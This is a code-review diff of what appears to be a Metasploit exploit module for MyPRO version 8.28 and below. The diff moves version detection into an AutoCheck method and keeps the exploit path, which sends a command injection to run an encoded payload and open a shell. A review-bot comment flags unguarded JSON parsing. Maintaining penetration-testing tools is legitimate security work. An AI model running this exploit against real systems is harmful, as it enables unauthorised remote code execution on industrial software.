|
1 | 1 | class MetasploitModule < Msf::Exploit::Remote |
2 | 2 | Rank = ExcellentRanking |
3 | 3 | include Msf::Exploit::Remote::HttpClient |
4 | | - include Msf::Exploit::CmdStager |
| 4 | + prepend Msf::Exploit::Remote::AutoCheck |
5 | 5 |
|
6 | 6 | def initialize(info = {}) |
7 | 7 | super( |
@@ -60,63 +60,63 @@ def initialize(info = {}) |
60 | 60 | ) |
61 | 61 | end |
62 | 62 |
|
63 | | - def exploit |
64 | | - connect |
65 | | - case target['Type'] |
66 | | - when :win_fetch |
67 | | - execute_command(payload.encoded) |
68 | | - end |
69 | | - end |
70 | | - |
71 | | - def execute_command(cmd, _opts = {}) |
72 | | - print_status('Checking MyPRO version...') |
73 | | - check_version |
74 | | - print_status('Checking credentials...') |
75 | | - check_auth |
76 | | - print_status('Sending command injection...') |
77 | | - exec_mypro(cmd) |
78 | | - print_status('Exploit finished, check thy shell.') |
79 | | - handler |
80 | | - end |
81 | | - |
82 | 63 | # Determine if the MyPRO instance runs a vulnerable version |
83 | | - def check_version |
84 | | - res = send_request_cgi({ |
85 | | - 'method' => 'POST', |
86 | | - 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), |
87 | | - 'vars_post' => { |
88 | | - 't' => '98' |
89 | | - } |
90 | | - }) |
91 | | - |
92 | | - unless res |
93 | | - fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') |
94 | | - |
| 64 | + def check |
| 65 | + begin |
| 66 | + res = send_request_cgi({ |
| 67 | + 'method' => 'POST', |
| 68 | + 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), |
| 69 | + 'vars_post' => { |
| 70 | + 't' => '98' |
| 71 | + } |
| 72 | + }) |
| 73 | + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError |
| 74 | + return CheckCode::Unknown |
| 75 | + ensure |
| 76 | + disconnect |
95 | 77 | end |
| 78 | + |
96 | 79 | if res && res.code == 200 |
97 | 80 | regex = /\{.*\}/m |
98 | 81 | json_body = res.body[regex, 0] |
99 | 82 | data = JSON.parse(json_body) |
100 | 83 | version = data['V'] |
101 | 84 | if version.nil? |
102 | | - fail_with(Failure::Unknown, 'Version missing from server response.') |
| 85 | + return CheckCode::Unknown |
103 | 86 | else |
104 | | - print_good('Version retrieved: ' + version) |
| 87 | + vprint_status('Version retrieved: ' + version) |
105 | 88 | end |
106 | 89 |
|
107 | 90 | parts = version.split('.') |
108 | 91 | major = parts[0] |
109 | 92 | minor = parts[1] |
110 | 93 | if major.to_i == 8 && minor.to_i <= 28 |
111 | | - print_good('Version is vulnerable.') |
| 94 | + return CheckCode::Appears |
112 | 95 | else |
113 | | - fail_with(Failure::NotVulnerable, 'Version is not vulnerable.') |
| 96 | + return CheckCode::Safe |
114 | 97 | end |
115 | 98 | else |
116 | | - fail_with(Failure::Unknown, 'Unexpected server response received.') |
| 99 | + return CheckCode::Unknown |
117 | 100 | end |
118 | 101 | end |
119 | 102 |
|
| 103 | + def exploit |
| 104 | + connect |
| 105 | + case target['Type'] |
| 106 | + when :win_fetch |
| 107 | + execute_command(payload.encoded) |
| 108 | + end |
| 109 | + end |
| 110 | + |
| 111 | + def execute_command(cmd) |
| 112 | + print_status('Checking credentials...') |
| 113 | + check_auth |
| 114 | + print_status('Sending command injection...') |
| 115 | + exec_mypro(cmd) |
| 116 | + print_status('Exploit finished, check thy shell.') |
| 117 | + handler |
| 118 | + end |
| 119 | + |
120 | 120 | # Check if credentials are working |
121 | 121 | def check_auth |
122 | 122 | res = send_request_cgi({ |
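Review bot: In the new `check`, `JSON.parse(json_body)` is unguarded: when a 200 response contains no `{...}` span, `res.body[regex, 0]` is nil and the parse raises `TypeError`, and a malformed body raises `JSON::ParserError`, so the method raises instead of returning a check code. The rescue added around `send_request_cgi` covers only the Rex connection errors. Since `AutoCheck` is now prepended, that exception would presumably surface before `exploit` runs rather than as a clean `CheckCode::Unknown`. Wrapping the parse, e.g. `begin; data = JSON.parse(json_body); rescue JSON::ParserError, TypeError; return CheckCode::Unknown; end`, keeps the result well-defined; `version.split('.')` likewise assumes `data['V']` is a String.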
|